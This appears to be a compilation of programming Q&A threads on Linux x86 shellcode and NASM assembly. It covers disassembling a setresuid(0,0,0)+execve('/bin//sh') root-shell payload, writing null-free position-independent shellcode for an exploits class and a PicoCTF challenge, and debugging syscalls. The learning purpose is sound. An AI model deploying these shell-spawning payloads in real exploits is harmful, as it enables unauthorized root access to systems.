How can I check the commands the given shellcode executes? - linux

Lets say I'm given the following shellcode:
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
How can I check what it means / the ASM instructions it represents?
Thanks :)

Compile and disassemble it! For your example:
$ cat example.c
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
$ make example.o
cc -c -o example.o example.c
$ objdump -D example.o
example.o: file format elf64-x86-64
Disassembly of section .data:
0000000000000000 <shellcode>:
0: 31 c0 xor %eax,%eax
2: 31 db xor %ebx,%ebx
4: 31 c9 xor %ecx,%ecx
6: 99 cltd
7: b0 a4 mov $0xa4,%al
9: cd 80 int $0x80
b: 6a 0b pushq $0xb
d: 58 pop %rax
e: 51 push %rcx
f: 68 2f 2f 73 68 pushq $0x68732f2f
14: 68 2f 62 69 6e pushq $0x6e69622f
19: 89 e3 mov %esp,%ebx
1b: 51 push %rcx
1c: 89 e2 mov %esp,%edx
1e: 53 push %rbx
1f: 89 e1 mov %esp,%ecx
21: cd 80 int $0x80
...
Note the use of objdump's -D flag to disassemble all sections, rather than just what it thinks the executable sections are.
As for what this code means, I guess we can break it down piece by piece (from above, with inline comments):
xor %eax,%eax // clear eax register
xor %ebx,%ebx // clear ebx register
xor %ecx,%ecx // clear ecx register
cltd // clear edx register (via sign-extension of eax
// - only a compiler would do this operation
// in this way, I'd guess, so your shell code
// probably wasn't hand-written
mov $0xa4,%al // put 0xa4 (decimal 164) into eax
int $0x80 // do system call. Syscall 164 is "sys_setresuid"
// - it takes three parameters, in ebx, ecx, and edx,
// so in this case, it's calling sys_setresuid(0, 0, 0);
pushq $0xb // push constant 0xb (decimal 11) to the stack
pop %rax // pop it back into rax
push %rcx // push the 0 in rcx to the stack
pushq $0x68732f2f // push constant to the stack (looks like ASCII? "//sh")
pushq $0x6e69622f // push constant to the stack (looks like ASCII? "/bin")
mov %esp,%ebx // put a pointer to this stack pushed stuff into ebx
push %rcx // push rcx again, it's still 0
mov %esp,%edx // put a pointer to this 0 on the stack into edx
push %rbx // push rbx, it's 0 too
mov %esp,%ecx // put a pointer to this 0 into ecx
int $0x80 // system call again - this time, it's call 11, which is
// sys_execve. It takes a pointer to a filename to execute
// and two more pointers to the arguments and environment to
// pass
So this code first calls:
sys_setresuid(0, 0, 0)
To give itself root privileges, and then calls sys_execve() to start running /bin/sh, giving a shell prompt.

Related

Assembly code to shell code: section .data and section .text in which order?

For an assignment, I wrote the following assembly code shell_exec.asm that should execute a shell in Linux:
section .data ; declare stuff
arg0 db "/bin/sh",0 ; 1st arg
align 4
argv dd arg0, 0 ; 2nd arg
envp dd 0 ; 3rd arg
section .text
global _start
_start:
mov eax, 0x0b ; execve
mov ebx, arg0 ; 1st arg
mov ecx, argv ; 2nd arg
mov edx, envp ; 3rd arg
int 0x80 ; kernel
I used nasm -f elf32 shell_exec.asm for compilation and ld -m elf_i386 -o shell_exec shell_exec.o for linking. Everything works so far and if I run ./shell_exec the shell spawns the way I want.
Now I wanted to extract the shell code (like \12\34\ab\cd\ef...) from this program. I used objdump -D -z shell_exec to show all parts of the code including the section .data and all zeroes. The output is as follows:
shell_exec: file format elf32-i386
Disassembly of section .text:
08049000 <_start>:
8049000: b8 0b 00 00 00 mov $0xb,%eax
8049005: bb 00 a0 04 08 mov $0x804a000,%ebx
804900a: b9 08 a0 04 08 mov $0x804a008,%ecx
804900f: ba 10 a0 04 08 mov $0x804a010,%edx
8049014: cd 80 int $0x80
Disassembly of section .data:
0804a000 <arg0>:
804a000: 2f das
804a001: 62 69 6e bound %ebp,0x6e(%ecx)
804a004: 2f das
804a005: 73 68 jae 804a06f <__bss_start+0x5b>
804a007: 00 add %al,(%eax)
0804a008 <argv>:
804a008: 00 a0 04 08 00 00 add %ah,0x804(%eax)
804a00e: 00 00 add %al,(%eax)
0804a010 <envp>:
804a010: 00 00 add %al,(%eax)
804a012: 00 00 add %al,(%eax)
If I only have a section .text within my assembly code, I can usually just copy all given values and use them as my shell code. But how is the order in case I have those two sections, namely .data and .text?
Edit 1
So, my second attempt is to do the assembly code like this:
section .text
global _start
_start:
mov ebp, esp
xor eax, eax
push eax ; -4
push "/sh " ; -8
push "/bin" ; -12
xor eax, eax
push eax
lea ebx, [ebp-12]
push ebx ; 1st arg
mov ecx, esp ; 2nd arg
lea edx, [ebp-4] ; 3rd arg
mov eax, 0x0b ; execve
int 0x80 ; kernel
This avoids using multiple sections, but sadly leads to a segmentation fault.

NASM Segmentation fault

I'm using a 64-bit Ubuntu 18.04.3 LTS VM and I'm trying to write a simple x64 assembly code that will print "Owned!!!".
Because I don't want any 0x00 or 0x0a bytes and I want the code to be position independent (because I'm learning how to write shellcodes), I wrote it this way:
;hello4.asm attempts to make the code position independent
section .text
global _start
_start:
;clear out the registers we are going to need
xor rax, rax
xor rbx, rbx
xor rcx, rcx
xor rdx, rdx
;write(int fd, char *msg, unsigned int len)
mov al, 4
mov bl, 1
;Owned!!! = 4f,77,6e,65,64,21,21,21
;push !,!,!,d
push 0x21212164
;push e,n,w,O
push 0x656e774f
mov rcx, rsp
mov dl, 8
int 0x80
;exit(int ret)
mov al,1
xor rbx, rbx
int 0x80
This is the output that I'm getting:
user#PC:~/Desktop/exploitsclass/hello_shellcode$ nasm -f elf64 hello4.asm
user#PC:~/Desktop/exploitsclass/hello_shellcode$ ld hello4.o -o hello4
user#PC:~/Desktop/exploitsclass/hello_shellcode$ objdump -d hello4 -M intel
hello4: file format elf64-x86-64
Disassembly of section .text:
0000000000400080 <_start>:
400080: 48 31 c0 xor rax,rax
400083: 48 31 db xor rbx,rbx
400086: 48 31 c9 xor rcx,rcx
400089: 48 31 d2 xor rdx,rdx
40008c: b0 04 mov al,0x4
40008e: b3 01 mov bl,0x1
400090: 68 64 21 21 21 push 0x21212164
400095: 68 4f 77 6e 65 push 0x656e774f
40009a: 48 89 e1 mov rcx,rsp
40009d: b2 08 mov dl,0x8
40009f: cd 80 int 0x80
4000a1: b0 01 mov al,0x1
4000a3: 48 31 db xor rbx,rbx
4000a6: cd 80 int 0x80
user#PC:~/Desktop/exploitsclass/hello_shellcode$ ./hello4
Segmentation fault (core dumped)
How do I fix this?
UPDATE:
I've understood that int 0x80 is intended for 32-bit programs and I should use syscall instead and that syscall has different ids for each system call.
The new code is:
;hello4.asm attempts to make the code position independent
section .text
global _start
_start:
;clear out the registers we are going to need
xor rax, rax
xor rsi, rsi
xor rdi, rdi
xor rdx, rdx
;write(int fd, char *msg, unsigned int len)
mov al, 1
add di, 1
;Owned!!! = 4f,77,6e,65,64,21,21,21
;push !,!,!,d
push 0x21212164
;push e,n,w,O
push 0x656e774f
mov rsi, rsp
mov dl, 8
syscall
;exit(int ret)
mov al, 60
xor rdi, rdi
syscall
The output is Owne% instead of Owned!!! now.
It still needs to be fixed.
With the help of #CertainLach I've written the correct code:
;hello4.asm attempts to make the code position independent
section .text
global _start
_start:
;clear out the registers we are going to need
xor rax, rax
xor rsi, rsi
xor rdi, rdi
xor rdx, rdx
;write(int fd, char *msg, unsigned int len)
mov al, 1
add di, 1
;Owned!!! = 4f,77,6e,65,64,21,21,21
mov rsi, 0x21212164656e774f
push rsi
mov rsi, rsp
mov dl, 8
syscall
;exit(int ret)
mov al, 60
xor rdi, rdi
syscall
This code contains no null bytes or 0x0a bytes and it's position-independent, as following:
user#PC:~/Desktop/exploitsclass/hello_shellcode$ objdump -d hello4 -M intel
hello4: file format elf64-x86-64
Disassembly of section .text:
0000000000400080 <_start>:
400080: 48 31 c0 xor rax,rax
400083: 48 31 f6 xor rsi,rsi
400086: 48 31 ff xor rdi,rdi
400089: 48 31 d2 xor rdx,rdx
40008c: b0 01 mov al,0x1
40008e: 66 83 c7 01 add di,0x1
400092: 48 be 4f 77 6e 65 64 movabs rsi,0x21212164656e774f
400099: 21 21 21
40009c: 56 push rsi
40009d: 48 89 e6 mov rsi,rsp
4000a0: b2 08 mov dl,0x8
4000a2: 0f 05 syscall
4000a4: b0 3c mov al,0x3c
4000a6: 48 31 ff xor rdi,rdi
4000a9: 0f 05 syscall
This is also a correct way of implementing the solution, which is 1 bytecode less, but with more memory consumption:
user#PC:~/Desktop/exploitsclass/hello_shellcode$ cat hello4.asm
;hello4.asm attempts to make the code position independent
section .text
global _start
_start:
;clear out the registers we are going to need
xor rax, rax
xor rsi, rsi
xor rdi, rdi
xor rdx, rdx
;write(int fd, char *msg, unsigned int len)
mov al, 1
add di, 1
;Owned!!! = 4f,77,6e,65,64,21,21,21
;push !,!,!,d
push 0x21212164
;push e,n,w,O
push 0x656e774f
mov rsi, rsp
mov dl, 16
syscall
;exit(int ret)
mov al, 60
xor rdi, rdi
syscall
user#PC:~/Desktop/exploitsclass/hello_shellcode$ objdump -d hello4 -M intel
hello4: file format elf64-x86-64
Disassembly of section .text:
0000000000400080 <_start>:
400080: 48 31 c0 xor rax,rax
400083: 48 31 f6 xor rsi,rsi
400086: 48 31 ff xor rdi,rdi
400089: 48 31 d2 xor rdx,rdx
40008c: b0 01 mov al,0x1
40008e: 66 83 c7 01 add di,0x1
400092: 68 64 21 21 21 push 0x21212164
400097: 68 4f 77 6e 65 push 0x656e774f
40009c: 48 89 e6 mov rsi,rsp
40009f: b2 10 mov dl,0x10
4000a1: 0f 05 syscall
4000a3: b0 3c mov al,0x3c
4000a5: 48 31 ff xor rdi,rdi
4000a8: 0f 05 syscall
Thank you so much!
Can't answer your comment, you can't just change int 0x80 to syscall to make it work, system call numbers differ, i.e sys_write you have here, have id 4 for int 0x80, and id 1 with syscall
Here you can see numbers for syscall
And here for int 0x80

Basic input with x64 assembly code

I am writing a tutorial on basic input and output in assembly. I am using a Linux distribution (Ubuntu) that is 64 bit. For the first part of my tutorial I spoke about basic output and created a simple program like this:
global _start
section .text
_start:
mov rax,1
mov rdi,1
mov rsi,message
mov rdx,13
syscall
mov rax,60
xor rdi,rdi
syscall
section .data
message: db "Hello, World", 10
That works great. The system prints the string and exits cleanly. For the next part of my tutorial, I simply want to read one character in from the keyboard. From my understanding of this web site we change the rdi register to be 0 for a sys_read call.
I first subtract 8 from the current rsp and then load that address into the rsi register. (That is where I want to store the char). When I compile and run my program it appears to work... but the terminal seems to mimick the input I type in again.
Here is the program:
global _start
section .text
_start:
sub rsp,8 ; allocate space on the stack to read
mov rdi,0 ; set rdi to 0 to indicate a system read
mov rsi,[rsp-8]
mov rdx,1
syscall
mov rax,1
mov rdi,1
mov rsi,message
mov rdx,13
syscall
mov rax,60
xor rdi,rdi
syscall
section .data
message: db "Hello, World", 10
and this is what happens in my terminal...
matthew#matthew-Precision-WorkStation-690:~/Documents/Programming/RockPaperScissors$ nasm -felf64 rps.asm && ld rps.o && ./a.out
5
Hello, World
matthew#matthew-Precision-WorkStation-690:~/Documents/Programming/RockPaperScissors$ 5
5: command not found
matthew#matthew-Precision-WorkStation-690:~/Documents/Programming/RockPaperScissors$
The input 5 is repeated back to the terminal after the program has exited. What is the proper way to read in a single char using NASM and Linux x64?
In your first code section you have to set the SYS_CALL to 0 for SYS_READ (as mentioned rudimentically in the other answer).
So check a Linux x64 SYS_CALL list for the appropriate parameters and try
_start:
mov rax, 0 ; set SYS_READ as SYS_CALL value
sub rsp, 8 ; allocate 8-byte space on the stack as read buffer
mov rdi, 0 ; set rdi to 0 to indicate a STDIN file descriptor
lea rsi, [rsp] ; set const char *buf to the 8-byte space on stack
mov rdx, 1 ; set size_t count to 1 for one char
syscall
it appears to work... but the terminal seems to mimick the input I type in again.
No, the 5 + newline that bash reads is the one you typed. Your program waited for input but didn't actually read the input, leaving it in the kernel's terminal input buffer for bash to read after your program exited. (And bash does its own echoing of terminal input because it puts the terminal in no-echo mode before reading; the normal mechanism for characters to appear on the command line as you type is for bash to print what it reads.)
How did your program manage to wait for input without reading any? mov rsi, [rsp-8] loads 8 bytes from that address. You should have used lea to set rsi to point to that location instead of loading what was in that buffer. So read fails with -EFAULT instead of reading anything, but interestingly it doesn't check this until after waiting for there to be some terminal input.
I used strace ./foo to trace system calls made by your program:
execve("./foo", ["./foo"], 0x7ffe90b8e850 /* 51 vars */) = 0
read(0, 5
NULL, 1) = -1 EFAULT (Bad address)
write(1, "Hello, World\n", 13Hello, World
) = 13
exit(0) = ?
+++ exited with 0 +++
Normal terminal input/output is mixed with the strace output; I could have used -o foo.trace or whatever. The cleaned-up version of the read system call trace (without the 5\n mixed in) is:
read(0, NULL, 1) = -1 EFAULT (Bad address)
So (as expected for _start in a static executable under Linux), the memory below RSP was zeroed. But anything that isn't a pointer to writeable memory would have produced the same result.
zx485's answer is correct but inefficient (large code-size and an extra instruction). You don't need to worry about efficiency right away, but it's one of the main reasons for doing anything with asm and there's interesting stuff to say about this case.
You don't need to modify RSP; you can use the red-zone (memory below RSP) because you don't need to make any function calls. This is what you were trying to do with rsp-8, I think. (Or else you didn't realize that it was only safe because of special circumstances...)
The read system call's signature is
ssize_t read(int fd, void *buf, size_t count);
so fd is an integer arg, so it's only looking at edi not rdi. You don't need to write the full rdi, just the regular 32-bit edi. (32-bit operand-size is usually the most efficient thing on x86-64).
But for zero or positive integers, just setting edi also sets rdi anyway. (Anything you write to edi is zero-extended into the full rdi) And of course zeroing a register is best done with xor same,same; this is probably the best-known x86 peephole optimization trick.
As the OP later commented, reading only 1 byte will leave the newline unread, when the input is 5\n, and that would make bash read it and print an extra prompt. We can bump up the size of the read and the space for the buffer to 2 bytes. (There'd be no downside to using lea rsi, [rsp-8] and leave a gap; I'm using lea rsi, [rsp-2] to pack the buffer right below argc on the stack, or below the return value if this was a function instead of a process entry point. Mostly to show exactly how much space is needed.)
; One read of up to 2 characters
; giving the user room to type a digit + newline
_start:
;mov eax, 0 ; set SYS_READ as SYS_CALL value
xor eax, eax ; rax = __NR_read = 0 from unistd_64.h
lea rsi, [rsp-2] ; rsi = buf = rsp-2
xor edi, edi ; edi = fd = 0 (stdin)
mov edx, 2 ; rdx = count = 2 char
syscall ; sys_read(0, rsp-2, 2)
; total = 16 bytes
This assembles like so:
+ yasm -felf64 -Worphan-labels -gdwarf2 foo.asm
+ ld -o foo foo.o
ld: warning: cannot find entry symbol _start; defaulting to 0000000000400080
$ objdump -drwC -Mintel
0000000000400080 <_start>:
400080: 31 c0 xor eax,eax
400082: 48 8d 74 24 ff lea rsi,[rsp-0x1]
400087: 31 ff xor edi,edi
400089: ba 01 00 00 00 mov edx,0x1
40008e: 0f 05 syscall
; next address = ...90
; I left out the rest of the program so you can't actually *run* foo
; but I used a script that assembles + links, and disassembles the result
; The linking step is irrelevant for just looking at the code here.
By comparison, zx485's answer assembles to 31 bytes. Code size is not the most important thing, but when all else is equal, smaller is better for L1i cache density, and sometimes decode efficiency. (And my version has fewer instructions, too.)
0000000000400080 <_start>:
400080: 48 c7 c0 00 00 00 00 mov rax,0x0
400087: 48 83 ec 08 sub rsp,0x8
40008b: 48 c7 c7 00 00 00 00 mov rdi,0x0
400092: 48 8d 34 24 lea rsi,[rsp]
400096: 48 c7 c2 01 00 00 00 mov rdx,0x1
40009d: 0f 05 syscall
; total = 31 bytes
Note how those mov reg,constant instructions use the 7-byte mov r64, sign_extended_imm32 encoding. (NASM optimizes those to 5-byte mov r32, imm32 for a total of 25 bytes, but it can't optimize mov to xor because xor affects flags; you have to do that optimization yourself.)
Also, if you are going to modify RSP to reserve space, you only need mov rsi, rsp not lea. Only use lea reg1, [rsp] (with no displacement) if you're padding your code with longer instructions instead of using a NOP for alignment. For source registers other than rsp or rbp, lea won't be longer but it is still slower than mov. (But by all means use lea to copy-and-add. I'm just saying it's pointless when you can replace it with a mov.)
You could save even more space by using lea edx, [rax+1] instead of mov edx,1 at essentially no performance cost, but that's not something compilers normally do. (Although perhaps they should.)
You need to set eax to the system call number for read.

Why don't some shellcode in PicoCTF Shellz work even though it means the same as those which do?

I am trying to understand the shellcode solution to this CTF problem.
0: 31 c9 xor ecx,ecx
2: f7 e1 mul ecx
4: b0 0b mov al,0xb
6: 51 push ecx
7: 68 2f 2f 73 68 push 0x68732f2f
c: 68 2f 62 69 6e push 0x6e69622f
11: 89 e3 mov ebx,esp
13: cd 80 int 0x80
My understanding of the shellcode is as follows:
ecx is set to 0.
eax *= ecx, so eax = 0
The lower 8 bits of eax (ie al) is set to 0xb : opcode for execve().
"/bin//sh" is pushed to the stack. Its pointer is put in ebx (first argument of execve).
int 0x80 is the syscall interrupt. We run execve("/bin//sh") and the shell is open for us to use.
The arch seems to be i386 the way the registers are named. Definitely 32 bits.
What I do not understand is as follows:
Why is it when I replace mul ecx with mov eax, 0x0 or xor eax, eax, the shell does not spawn? Don't they all set eax to 0? When I replaced only xor ecx, ecx with mov ecx, 0x0 and it worked fine.
When I replaced mov al, 0xb with mov eax, 0xb, it worked fine. But when I subsequently removed mul ecx, it didnt work anymore. Why is mul ecx necessary? If I change the entire eax value to 0xb, doesn't that mean i dont need to set it to 0 first? I'm guessing the original shellcode has to because it only sets the lower 8 bits of eax to 0xb (mov al, 0xb). So the higher 24 bits needs to be 0.
Thanks for the help guys.

Segmentation Fault happening before any code is run Assembly

I am trying to write a shell code program that will call execve and spawn a shell. I am working in a 32 bit virtual machine that was offered for this class. The code is as follows:
section .text
global _start
_start:
;clear out registers
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
;exacve("/bin/sh",Null,NULL)
;ascii for /bin/sh;
;2f 62 9 6e 2f 73 68 3b
push 0x3b68732f
push 0x6e69622f
mov ebx, esp
mov al, 11
int 0x80
;exit(int status)
movv al, 1
xor ebx, ebx
int 0x80
I compile with nasm -f elf -g shell.asm and link with ld -o shell shell.o
When I try to run it, I get a segmentation fault. I tried using gdb to see where I made the mistake, but, it segfaults even if a set a break point at _start+0. It says that there was a segfault at the address after the last instruction for the code.
i.e. if The last line has an address of 0x804807c then the segmentation fault happens at 0x804807e before any of the code has a chance to run.
Could any one point me in the right direction so I can figure out how to fix this?
One mistake in your code is, that there is no 0x3b in ascii code of the string:
;exacve("/bin/sh",Null,NULL)
;ascii for /bin/sh;
;2f 62 9 6e 2f 73 68 3b
push 0x3b68732f
push 0x6e69622f
This following code shall fix this problem (assuming you do work with a little-endian machine):
;exacve("/bin/sh",Null,NULL)
;ascii for /bin/sh;
;2f 62 99 6e 2f 73 68 00
push 0x0068732f
push 0x6e69622f

Resources